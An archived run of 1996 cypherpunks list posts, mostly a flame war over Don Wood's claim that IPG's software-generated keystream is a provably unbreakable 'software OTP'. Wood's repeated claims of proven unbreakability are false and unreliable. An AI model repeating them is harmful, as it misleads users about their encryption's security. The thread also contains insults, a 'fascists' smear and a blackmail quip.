From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 29 Nov 1996 21:20:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: More anonymous hate mail from John Gilmore, Timmy May, and
In-Reply-To: <199611291954.LAA10738@adnetsol.adnetsol.com>
Message-ID: <imV7XD33w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Ross Wright" <rwright@adnetsol.com> writes:

> On or About 28 Nov 96 at 15:21, Dr.Dimitri Vulis KOTM wrote:
>
> > because Americans are so stupid.
>
> Come on, doc.  That's a bit of a generalization.  You don't want to
> piss off people who like you, now, do you?

Hi Ross - well, generally, I think most people are stupid, irrespective of
their ethnicity. I'm just trying to piss off some more c-punks. :-)

OK, OK, point taken, I'll desist.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@adsl-122.cais.com>
Date: Fri, 29 Nov 1996 20:37:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: KUDOS to Kathleen: [Re: Dorthy Denning is a boot-licking fasicist!!!]
In-Reply-To: <199611282127.OAA10714@infowest.com>
Message-ID: <9611300437.AA05806@adsl-122.cais.com>
MIME-Version: 1.0
Content-Type: text


attila@primenet.com wrote:
> 
> 
>         good, solid statement of purpose which too few of us practice. 
>     it is general human nature to be protective (usually in a jealous 
>     sense) of our nurtured opinions. However, that is not an excuse to 
>     be abusive of another.  

Unfortunatly the "too few of us practice" line could have read
'too few of us on cypherpunks practice'. Crypto has really been
suffused by noise on this list badly. One of the reasons I origionaly
signed on this list was that it was a really happening place for
crypto & cypherpunk-ish "values" (as it were), and other venues were
just "too noisey". I recently, out of dispair, checked some of the
'other' venues, and found them to have 90% more crypto related stuff.
It's rather sad, too much freak ranting & political bs, and too
little crypto. 

>         It is one thing to be vituperatively demonstrative, another to 
>     criticize anothers view point by epithetical allegorations, and 
>     another, with careful consideration, to disagree with _civilized_
>     clinically definable examples which delineate your viewport.
> 
When it comes to the Dennings, (I speak of Mr. & Mrs., they are fairly
blissfully married.) they are two people who are some of the MOST 
flameproof that I have ever seen. Rank insults are NOT going to get
anyone anywhere with them, except to possibly increase their sense
of persecution. Peter Denning is not a very popular guy with everyone
where he works to say the least, and has suffered some absolutly withering
attacks for HIS politics at George Mason university, to a degree that
makes even the most intense crap I've seen tossed around Cypherpunks look
contemptibly childish.

In a nutshell, all this anti-denning ranting on here is bush league,
amateur hour, kiddie stuff compared to what they've gotten elsewhere
for different reasons. (Well marginaly, they're facists, and that
is pretty much a shared theme with their politics in multiple arenas)

If you're one of the people who's written with that slant on this
thread and is going "but"... Trust me, you're both unimpressive and
non-competative on the insult-the-dennings front. As an example,
Peter had his face pasted over that of Hitler's in a poster that was
widely circulated on the GMU campus (that imfamous shot of Hitler
& Mussolini arm in arm, with Mr. M. being another prof.) by anonymous
types who were seeking (I guess <rolls his eyes>) to piss him
off in reply to some of his more extreme academic political positions.

If you want to accomplish something, I'd reccomend developing 
REAL-WORLD arguments to their facisim, and working on making THOSE
withering, rather than wasting time with _talentless_ insults.
Yes the Dennings are scary folks who would be right at home in
1941 Germany, but no, insults arn't going to even break wind in
their direction... You need to do _far_ better.

(with apoligies to attila, who all this was NOT directed at)
Tim Scanlon








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Fri, 29 Nov 1996 23:40:56 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <FL8yXD37w165w@bwalk.dm.com>
Message-ID: <Pine.BSI.3.95.961130013052.19278A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 25 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> paul@fatmans.demon.co.uk writes:
> 
> >
> > >      The algorythm cannot be considered secure until it has been
> > > peer-reviewed. They refuse to release the algorythm for review, simply sayi
> > > that "you can't break the code" therefore "it is secure".
> >
> > This isn`t strictly true. Don Wood (spit) has actually released the
> > algorithm details for review.
> 
> What did poor Don Wood do to deserve the (spit) after his name? Is he a liar
> and a content-based plug-puller, like John Gilmore (spit)? Is he an ignorant
> pseudo-cryptoid like Paul "Brute Force Attack on One-Time Pad" Bradley (spit)?

Amen, and that is only a small part of the gobbldegook that  Bradley and
his claque  have turkey squatted on you. As I have said before,
    PBradleyinfo = PBradleyinfo log_base_infinity PBradleyinfo 

Thanks Dr. Vulis and DT and others for yur kindness.


With Kindest regards,

Don Wood






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Fri, 29 Nov 1996 23:42:38 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <NJJZXD41w165w@bwalk.dm.com>
Message-ID: <Pine.BSI.3.95.961130014145.19278B-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 26 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> paul@fatmans.demon.co.uk writes:
> > >It seems to me they're putting an additional layer of stuff ("OTP") between
> > >the key generation and the actual encoding, so what's the problem with that,
> > >as a concept?
> >
> > Well for a start it`s not a one time pad because that requires a
> > totally real random pad. They have a stream cipher, as for whether it
> > is any good or not I would normally not trust a man with the talent
> > for bullshit Don Wood has.
> 
> I suppose Paul doesn't consider his own ruminations about "brute force attacks
> against one-time pads" to be "bullshit".
> 
> 
I could not agree more,

Don Wood





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Sat, 30 Nov 1996 00:15:07 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <199611240241.SAA29110@netcom6.netcom.com>
Message-ID: <Pine.BSI.3.95.961130015710.19278C-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 23 Nov 1996, Bill Frantz wrote:

> >>I should have said "it's currently impossible to
> >>prove an algorithim unbreakable". :-)
> >
> >Or, more accurately, nobody credible has seen such a proof.  But, a
> >clever person might invent one.
> 
> I thought Shannon proved one-time-pads to be unbreakable using information
> theory.
> 
Shannon did, but Paul Bradley and friends(sic) proved that he/they could
brute force OTPs, its on the record, so I guess Shannon was wrong, Nes
pas?  Someone as certain of his facts as PB cannot possibly be wrong, or
did he say he was asleep - I guess so, he is obviously always asleep.

I also can prove that our algorithm cannot be broken. All you
have to do is to examine the algorithm and you will understand why it is
unbreakable. That is a lot of chutzpah, but once you understand the
algorithm and how simple it is to prove its unbreakability, then you will
understand that our claim is absolutely correct.

Unfortunately, many of you would rather beat your fingers on the
keyboard about the abstract than find out the truth for yourself. It
is really very simple. Again, I repeat, if you would like a free copy,
please send a e-mail request to:

                     ipsales@cyberstation.net

As for the algorithm, it is at:

                     netprivacy.com



With kindest regards, 

Don Wood





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Sat, 30 Nov 1996 00:21:22 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.LNX.3.94.961124024959.14102A-100000@random.sp.org>
Message-ID: <Pine.BSI.3.95.961130021602.19278D-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 24 Nov 1996, The Deviant wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Sat, 23 Nov 1996, John Anonymous MacDonald wrote:
> 
> > 
> > At 12:33 PM 11/23/1996, Eric Murray wrote:
> > >John Anonymous MacDonald writes:
> > >> 
> > >> 
> > >> At 8:09 AM 11/23/1996, Eric Murray wrote:
> > >> >No, you can't.  It's impossible to prove an algorithim unbreakable.
> > >> 
> > >> No?  Please prove your assertion.
> > >
> > >You can't prove a negative.
> > 
> > If it can't be proven, why do you believe it is true?
> > 
> > The good news is that you can prove a negative.  For example, it has
> > been proven that there is no algorithm which can tell in all cases
> > whether an algorithm will stop.
> 
> No, he was right.  They can't prove that their system is unbreakable.
> They _might_ be able to prove that their system hasn't been broken, and
> they _might_ be able to prove that it is _unlikely_ that it will be, but
> they *CAN NOT* prove that it is unbreakable.  This is the nature of
> cryptosystems.
> 
> > >The best IPG could say is that
> > >it can't be broken with current technology.
> > >Next week someone might come up with a new way
> > >to break ciphers that renders the IPG algorithim breakable.
> > 
> > The best they can say is what they did say: they have a proof that
> > their system is unbreakable.  What you question, quite reasonably,
> > is whether they have such a proof.
> 
> It is impossible to prove such a thing.  It's like saying you have proof
> that you have the last car of a certain model ever to be built.  Anybody
> could come along and build another, and then you don't have the last one.
> 
> > 
> > >You point could have been that the same problem exists
> > >for proofs- that next week someone could come up
> > >with a way to prove, for all time, that an algorithim
> > >really IS unbreakable.  So, to cover that posibility
> > >I should have said "it's currently impossible to
> > >prove an algorithim unbreakable". :-)
> > 
> > Or, more accurately, nobody credible has seen such a proof.  But, a
> > clever person might invent one.
> 
> There *IS NO SUCH PROOF*.  Just like you can't prove that god created the
> universe, or that Oswald shot Kennedy, and so on and so forth.  It can't
> be proven.  It never has been proven, and it never will be proven.  People
> have new ideas, new algorithms are invented.  Someday, somebody will crack
> _all_ the cryptosystems that have now been invented.
> 

To repeat Frantz', I thought Shannon proved OTPs were unbreakable. I can
also assure you that they are unbreakable, because you cannot solve a
three variable equation where only one variable is known, ie. the
ciphertext. That is a fact, not an opinion like God, or Oswald, there are
facts and opinions. It is a fact that OTPs are unbreakable and it is a
fact that our system is unbreakable. Q.E.D. for the very same reasons
except that we must use exclusionary proof instead of inclusionary proof
like Shannon. 

With Kindest Regards,

Don Wood






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Sat, 30 Nov 1996 00:27:49 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <3297C65F.4F7@gte.net>
Message-ID: <Pine.BSI.3.95.961130022230.19278E-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 23 Nov 1996, Dale Thorn wrote:

> Igor Chudov @ home wrote:
> > Black Unicorn wrote:
> > > On Sat, 23 Nov 1996, Eric Murray wrote:
> > > > John Anonymous MacDonald writes:
> > > > > At 8:09 AM 11/23/1996, Eric Murray wrote:
> > > > > >No, you can't.  It's impossible to prove an algorithim unbreakable.
> 
> > > > > No?  Please prove your assertion.
> 
> > > > You can't prove a negative.  The best IPG could say is that
> > > > it can't be broken with current technology.
> > > > Next week someone might come up with a new way
> > > > to break ciphers that renders the IPG algorithim breakable.
> 
> > > Someone needs to write an IPG and Don Wood FAQ.  No, I'm not volunteering.
> 
> If you want to do that, why not do so as a response to Don's FAQ?
> 
> > As a crypto amateur, I would appreciate a good technical explanation as
> > to why IPG's algorithm cannot be considered secure.
> 
> Is the concept here that:  Whereas conventional crypto generates/hashes
> a *key* with which to encode the text, IPG generates a *pad* from a key,
> more or less the length of the text, with which to encode the text??
> 
> It seems to me they're putting an additional layer of stuff ("OTP") between
> the key generation and the actual encoding, so what's the problem with that,
> as a concept?
> 
That is one reasonable interpretation/explanation  of what we are doing.
It is also extremely fast and is used one time only, guaranteed unless the
user deliberately sabotages their own system.
The process is quite simple and discussed in detail at our web site,

               netprivacy.com

Obviously, a number of you have read it. 

With kindest regards,

Don Wood
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Juan Manuel" <Paramar@ns.sinfo.net>
Date: Fri, 29 Nov 1996 23:26:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199611300727.CAA13093@ns.sinfo.net>
MIME-Version: 1.0
Content-Type: text/plain


sign-off

--
JUAN MANUEL RICO
CIUDAD DE PANAMA - PANAMA

HTTP://www.paramar.com/index.html
mailto:jmro@paramar.com
mailto:info@paramar.com

PARAMAR IMPORT & EXPORT, LTDA.
SERVICIO DE PRIMERA CLASE A SU CARGA
TEL: 507 2239836 - FAX: 507 2239837
--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Sat, 30 Nov 1996 00:41:41 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.LNX.3.94.961124141239.15389B-100000@random.sp.org>
Message-ID: <Pine.BSI.3.95.961130023512.19278G-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 24 Nov 1996, The Deviant wrote:

> > At  4:21 PM 11/23/96 -0800, John Anonymous MacDonald wrote:
> > >At 12:33 PM 11/23/1996, Eric Murray wrote:
> > >>You point could have been that the same problem exists
> > >>for proofs- that next week someone could come up
> > >>with a way to prove, for all time, that an algorithim
> > >>really IS unbreakable.  So, to cover that posibility
> > >>I should have said "it's currently impossible to
> > >>prove an algorithim unbreakable". :-)
> > >
> > >Or, more accurately, nobody credible has seen such a proof.  But, a
> > >clever person might invent one.
> > 
> > I thought Shannon proved one-time-pads to be unbreakable using information
> > theory.
> 
> Different ball game.  OTP isn't "unbreakable" .  OTPs are secure because
> no matter what key you use, it _will_ decrypt, so your plaintext is still
> hidden simply because it could decrypt to whatever the person trying to
> decrypt it wants it to.  Its not that its unbreakable, its that its
> breakable in _so many ways_.  
> 

More nonsense - unbreakable means that you cannot determine what the
plaintext is. Shannon proved that you cannot prove what the plaintext
is for OTPs, or for the system we have developed either. The fact that it
could possibly be any plain text simply is another way of saying that it
is unbreakable, they are one and the same thing. Like so many you are
talking in circles and do not know what you are talking about or you
would not waste your time on such nonsense - Paul Bradley even knows how
to brute force OTPs, so you must be wrong there to.

With Kindest regards,

Don Wood
 

> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Sat, 30 Nov 1996 01:00:20 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: IPG Algorith Broken!  Chudov - Thorn etal,
In-Reply-To: <Pine.LNX.3.94.961124145135.15531A-100000@random.sp.org>
Message-ID: <Pine.BSI.3.95.961130024219.19278H-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 24 Nov 1996, The Deviant wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Sat, 23 Nov 1996, Dale Thorn wrote:
> 
> > Igor Chudov @ home wrote:
> > > Black Unicorn wrote:
> > > > On Sat, 23 Nov 1996, Eric Murray wrote:
> > > > > John Anonymous MacDonald writes:
> > > > > > At 8:09 AM 11/23/1996, Eric Murray wrote:
> > > > > > >No, you can't.  It's impossible to prove an algorithim unbreakable.
> > 
> > > > > > No?  Please prove your assertion.
> > 
> > > > > You can't prove a negative.  The best IPG could say is that
> > > > > it can't be broken with current technology.
> > > > > Next week someone might come up with a new way
> > > > > to break ciphers that renders the IPG algorithim breakable.
> > 
> > > > Someone needs to write an IPG and Don Wood FAQ.  No, I'm not volunteering.
> > 
> > If you want to do that, why not do so as a response to Don's FAQ?
> > 
> > > As a crypto amateur, I would appreciate a good technical explanation as
> > > to why IPG's algorithm cannot be considered secure.
> > 
> > Is the concept here that:  Whereas conventional crypto generates/hashes
> > a *key* with which to encode the text, IPG generates a *pad* from a key,
> > more or less the length of the text, with which to encode the text??
> > 
> > It seems to me they're putting an additional layer of stuff ("OTP") between
> > the key generation and the actual encoding, so what's the problem with that,
> > as a concept?
> 
> a) what they're claiming is OTP isn't OTP.  They use algorithmicly
> generated "random" numbers.  Random numbers can't be algorithmicly
> generated.  If the numbers in "OTP" aren't random, it isn't OTP.  Its also
> very vulnerable.
> 
To quote the bard, King John, Act II at the end, Mad World, Mad Kings, Mad
Composition. We have repeatedly stated that we do not generate random
numbers, and agree that only hardware can generate true random numbers. I
have worked on more OTPs than probably all of the public responders to 
the cypherpunks lists put together. I know what kinds of tests that an OTP
must pass, and what they look like - I have designed very comprehensive
systems to analyzed them.

What I was trying to do,  using the neologism of "Software OTP," was to
point out that the encryptor stream will pass any of the tests that as
hardware produced OTP will. It is quite remarkable that so many of you
Simpleton's talk about the system without looking at it. Many of you have
and have found it to be intriguing. Paul Bradley admits to downloading the
system, he spent over five hours doing it according to our log, but he says
that he never did anything with it. Anyone that believes that also
believes that Paul knows how to brute force OTPs.

With Kindest regards,

Don Wood
[A





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Sat, 30 Nov 1996 01:10:43 -0800 (PST)
To: Alan Olsen <alan@ctrl-alt-del.com>
Subject: Re: Don Woods -- Crypto Creationist - Shannon Proof
In-Reply-To: <3.0.32.19961124114330.00dc0bec@mail.teleport.com>
Message-ID: <Pine.BSI.3.95.961130030250.19278I-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 24 Nov 1996, Alan Olsen wrote:

> At 02:18 AM 11/24/96 -0600, snow wrote:
> 
> >     The algorythm cannot be considered secure until it has been 
> >peer-reviewed. They refuse to release the algorythm for review, simply saying
> >that "you can't break the code" therefore "it is secure". 
> 
> Furthermore, in "Real Science", the burden of proof is on the one making
> the claim, not on the one everyone else to disprove it.
> 
> So far Mr. Wood has not provided any *proof* as to the substance of his
> claims.  He has provided some of the more interesting rants I have seen of
> late.  (Analysis of his style of posting is probibly better left to the
> Psychceramics list than Cypherpunks.)
> 
> Until he posts the algorythm (or at least some basis as to why we should
> trust his claims), his claims are worthless.  (As they would say on
> talk.origins: "Evidence is the coin of the realm here!".)
> 
You are correct other than for the fact that we have posted the
algorithm:

       http://www.netprivacy.com


And we have proven that it is unbreakable, as most of you are aware. Just 
look at the algorithm and you will understand why! It is self evident as
proven by Shannon. 

Also, there is no "s" in my last name, it is Wood, though call me
anything that you like. 

Also, as far as Perry not responding to me, he does but not on the
Cypherpunks list anymore. The other list is not personal, so we correspond
in private,

With kindest regards,

Don Wood





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Sat, 30 Nov 1996 01:15:19 -0800 (PST)
To: ben@algroup.co.uk
Subject: Re: IPG Algorith Broken!
In-Reply-To: <9611242036.aa13728@gonzo.ben.algroup.co.uk>
Message-ID: <Pine.BSI.3.95.961130031128.19278J-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 24 Nov 1996, Ben Laurie wrote:

> The Deviant wrote:
> > 
> > -----BEGIN PGP SIGNED MESSAGE-----
> > 
> > On Sun, 24 Nov 1996, John Anonymous MacDonald wrote:
> > 
> > > 
> > > At 6:56 PM 11/23/1996, The Deviant wrote:
> > > >On Sat, 23 Nov 1996, John Anonymous MacDonald wrote:
> > > >> The good news is that you can prove a negative.  For example, it has
> > > >> been proven that there is no algorithm which can tell in all cases
> > > >> whether an algorithm will stop.
> > > >
> > > >No, he was right.  They can't prove that their system is unbreakable.
> > > >They _might_ be able to prove that their system hasn't been broken, and
> > > >they _might_ be able to prove that it is _unlikely_ that it will be, but
> > > >they *CAN NOT* prove that it is unbreakable.  This is the nature of
> > > >cryptosystems.
> > > 
> > > Please prove your assertion.
> > > 
> > > If you can't prove this, and you can't find anybody else who has, why
> > > should we believe it?
> > 
> > Prove it?  Thats like saying "prove that the sun is bright on a sunny
> > day".  Its completely obvious.  If somebody has a new idea on how to
> > attack their algorithm, it might work.  Then the system will have been
> > broken.  You never know when somebody will come up with a new idea, so the
> > best you can truthfully say is "it hasn't been broken *YET*".  As I
> > remember, this was mentioned in more than one respected crypto book,
> > including "Applied Cryptography" (Schneier).
> 
> It seems appropriate to quote Schneier on the subject:
> 
> "Those who claim to have an unbreakable cipher simply because they can't break
> it are either geniuses or fools. Unfortunately, there are more of the latter in
> the world."
>
I cannot argue with that, obviously he is correct.
> 
> And...
> 
> "Believe it or not, there is a perfect encryption system. It's called a
> one-time pad..."
> 
Paul Bradley and others believe that you can brute force One Time Pads.
Of course, you cannot and neither can you brute force our system. It is
mathematically impossible as we have expounded on at length in past
postings.

With Kindest regards,

Don Wood






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Sat, 30 Nov 1996 01:20:59 -0800 (PST)
To: John Anonymous MacDonald <nobody@cypherpunks.ca>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <199611250124.RAA07293@abraham.cs.berkeley.edu>
Message-ID: <Pine.BSI.3.95.961130031903.19278K-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 24 Nov 1996, John Anonymous MacDonald wrote:

> 
> At 7:10 AM 11/24/1996, The Deviant wrote:
> >On Sun, 24 Nov 1996, John Anonymous MacDonald wrote:
> >> At 6:56 PM 11/23/1996, The Deviant wrote:
> >> >On Sat, 23 Nov 1996, John Anonymous MacDonald wrote:
> >> >> The good news is that you can prove a negative.  For example, it has
> >> >> been proven that there is no algorithm which can tell in all cases
> >> >> whether an algorithm will stop.
> >> >
> >> >No, he was right.  They can't prove that their system is unbreakable.
> >> >They _might_ be able to prove that their system hasn't been broken, and
> >> >they _might_ be able to prove that it is _unlikely_ that it will be, but
> >> >they *CAN NOT* prove that it is unbreakable.  This is the nature of
> >> >cryptosystems.
> >> 
> >> Please prove your assertion.
> >> 
> >> If you can't prove this, and you can't find anybody else who has, why
> >> should we believe it?
> >
> >Prove it?  Thats like saying "prove that the sun is bright on a sunny
> >day".  Its completely obvious.
> 
> In other words, you can't prove it.  Thought so.
> 
> >If somebody has a new idea on how to attack their algorithm, it might
> >work.  Then the system will have been broken.  You never know when
> >somebody will come up with a new idea, so the best you can truthfully
> >say is "it hasn't been broken *YET*".  As I remember, this was mentioned
> >in more than one respected crypto book, including "Applied Cryptography"
> >(Schneier).
> 
> Page number?
> 
> Perhaps it would be helpful to hear a possible proof.  If somebody
> were to show that breaking a certain cryptographic algorithm was
> NP-complete, many people would find this almost as good as proof that
> the algorithm is unbreakable.
> 
> Then if a clever person were to show that the NP-complete problems
> were not solvable in any faster way than we presently know how, you
> would have proof that a cryptographic algorithm was unbreakable.
> 
> There is no obvious reason why such a proof is not possible.
> 
> diGriz
> 
> 
I agree entirely, it is self evident that our system is unbreakable. Look
at it, as this author obviously has, and you will discover that truth for
yourself.

With kindest regards,

Don Wood


 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Sat, 30 Nov 1996 01:26:31 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <c2aXXD25w165w@bwalk.dm.com>
Message-ID: <Pine.BSI.3.95.961130032229.19278L-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 24 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> Alan Olsen <alan@ctrl-alt-del.com> babbles:
> > At 04:00 AM 11/24/96 -0500, Black Unicorn wrote:
> > >On Sun, 24 Nov 1996 eli+@gs160.sp.cs.cmu.edu wrote:
> > >
> > >> Maybe this one's different from all of those.  How valuable a secret
> > >> would you like to wager on that?  If IPG wants credibility, they should
> > >> retain a respected cryptographer, or several, to attack their scheme.
> > >
> > >"They" attempt this nearly daily by trying to taunt c'punks into
> > >evaluating the product for free.
> >
> > Then someone should not do it for free.  They should do it as a "data
> > recovery tool", advertise widely, make a few bucks, and show what a piece
> > of crap the IPG snakeoil is in the first place.
> >
That is impossible, it is self evident that it cannot be done. There are
some people who are trying to break it, but they will obviously find that
is impossible.

> > Cracktools are starting to become a profitable business as more and more
> > snakeoil products appear on the market.  (Most are marketed to law
> > enforcement, but that will probibly change...)
> >
> > There is a buck or two to be made here.
> 
> There's probably more money to be made by blackmailing the snake-oil
> peddler (pay me so I don't release the cracktool for your crap) than
> by selling the cracktools themselves.
> 
> ---
Give up, no one can break the IPG system. That is a fact, not an opinion,
like some of the cypherpunks.

With kindest regards,

Don Wood





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Sat, 30 Nov 1996 01:57:21 -0800 (PST)
To: paul@fatmans.demon.co.uk
Subject: Re: IPG Algorith Broken!
In-Reply-To: <849030317.93771.0@fatmans.demon.co.uk>
Message-ID: <Pine.BSI.3.95.961130033459.19278M-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 25 Nov 1996 paul@fatbrain.demon.co.uk wrote:

> 
>  Known-plaintext:   Unbreakable, since the pad is never reused
>  Chosen-plaintext:  Unbreakable, ditto
>  Adaptive-chosen-plaintext: Unbreakable, ditto
> 
> Correct but for a different reason. 
No correct period, for the same reason. To paraphrase Gertrude Stein, an
OTP is an OTP is an OTP.


>Re-using the pad does render the 
> security useless but the other reason is if we know part of the pad 
> AND the ciphertext (and hence the plaintext) or part of the plaintext 
> and the ciphertext and therefore the pad, We cannot solve the rest of 
> the ciphertext as the pad is true random and the next bits are 
> independent of all the previous ones so we cannot predict from what 
> we have.
> 
More dumbest information, from FAT BRAIN. If an OTP is used more than
once, it is not an OTP by definition. Plaintext xor Plaintext, even in
derivative forms. Like so much of his dribble, that paragraph contains 
some words but I challenge anyone to tell us what it means. It simply
does not say anything which translates into anything meaningful.    


Frequently, you fill in some, and maybe even all of the plaintext, if you
have part of the plain text, for example if you have the partial signature
of a message emanating from the White House of:

       Wi      Jef            on

You might reasonably conclude that the missing characters could be filled
in to be: 
        
       William Jefferson Clinton


Two plaintexts xored together can reveal much more than you might think.

With Kindest regards,

Don Wood





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Sat, 30 Nov 1996 02:05:10 -0800 (PST)
To: paul@fatmans.demon.co.uk
Subject: Re: IPG Algorith Broken!
In-Reply-To: <849030305.93656.0@fatmans.demon.co.uk>
Message-ID: <Pine.BSI.3.95.961130040004.19278O-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On , 25 Nov 1996 paul@fatbrain.demon.co.uk wrote:

> 
> > > Ahh... an OTP isn't unbreakable.  Its just so encredibly breakable that
> > > you never know which break was the correct one ;)
> > 
> > Note that Schneier says "perfect", not "unbreakable".
> 

More gobbledegook about nothing. Yes it is perfect and yes it is
unbreakable!

snip......
> 
> IPG`s algorithm is definitely NOT an OTP and Don Wood is a snakeoil 
> merchant.
>

Play it Paul, (or is it Sam, or fatbrain).

Never has one person said so much and said nothing,

Lead on McPuff(ery)

 
With kindest regards,

Don Wood






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Sat, 30 Nov 1996 02:15:40 -0800 (PST)
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <199611270044.SAA11917@algebra>
Message-ID: <Pine.BSI.3.95.961130040801.19278Q-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 26 Nov 1996, Igor Chudov @ home wrote:

> paul@fatmans.demon.co.uk wrote:
> > Perfect is a better term. Strictly speaking it is because there is no 
> > finite unicity distance (the amount of ciphertext with which the 
> > cipher can theoretically be broken). So, stricly speaking, for a given 
> > message C and a prospective pad, P, out of a set of N pads which may 
> > or may not be correct:
> > 
> > P(P|C) = N^-1
> 
> What does it mean?
> 
Yes, McPuff, what does it mean. Like all of your other pabulum, it does not
mean anything that has any significance to anyone living or yet to live.
I also greatly appreciate you defining unicity distance for me, I have
always wanted to know that.

With kindest regards,

Don Wood






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Sat, 30 Nov 1996 02:23:19 -0800 (PST)
To: "Dana W. Albrecht" <dwa@corsair.com>
Subject: Re: Provably "Secure" Crypto (was: IPG Algorithm Broken!)
In-Reply-To: <199611252028.MAA16855@vishnu.corsair.com>
Message-ID: <Pine.BSI.3.95.961130041844.19278R-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 25 Nov 1996, Dana W. Albrecht wrote:

> 
> 
> Our friend Don Woods seems to have inadvertently sparked what could be a 
> useful and serious discussion regarding "provably secure cryptography."



Not only that But I have proven that the IPG system is perfect, see the
proof at:

           http://www.netprivacy.com 

> 
And you can prove it to yourself, it is patently self evident iwhen you
examine the algorithm and uinderstand what it does.Need I say more.
Find out yourself.

Your friend,

Don Wood

> Not to be confused with the usual "unbreakable" snake oil we see peddled 
> so often, I refer to systems for which rigorous mathematical proof that 
> "there are no shortcuts" exists.  To my knowledge, no such systems, with 
> the exception of a real one-time pad, exist today.  However, I also 
> under the impression that ongoing research on this topic continues.  For 
> example, consider the work being done on "Lattice" cryptosystems (see 
> http://jya.com/lattice.htm).
> 
> "diGriz" is right.  Nothing precludes the existence of a cryptographic 
> algorithm for which a rigorous mathematical proof of "security" exists
> --- where "security" means a provable lower bound on the time required 
> for recovery of the key.  Indeed, it seems that finding such an 
> algorithm --- or providing the necessary rigorous proof for a current 
> algorithm --- is a laudable goal of academic cryptographic research.
> 
> Rigorous proofs of the non-existence of an algorithm are not new.  
> Neither are rigorous proofs that any algorithm which can solve a given 
> problem requires a minimal running time.  Or, in an even stronger sense, 
> that a particular known algorithm for a given problem is indeed a 
> (provably) optimal algorithm for that problem.
> 
> For a (non-cryptographic) example of a proof of the first sort --- that 
> is, that "there exists no algorithm" --- consider the famous "Halting 
> Problem" for Turing machines.  (I believe someone else has also 
> mentioned this.)  There are many proofs such as this one, often related, 
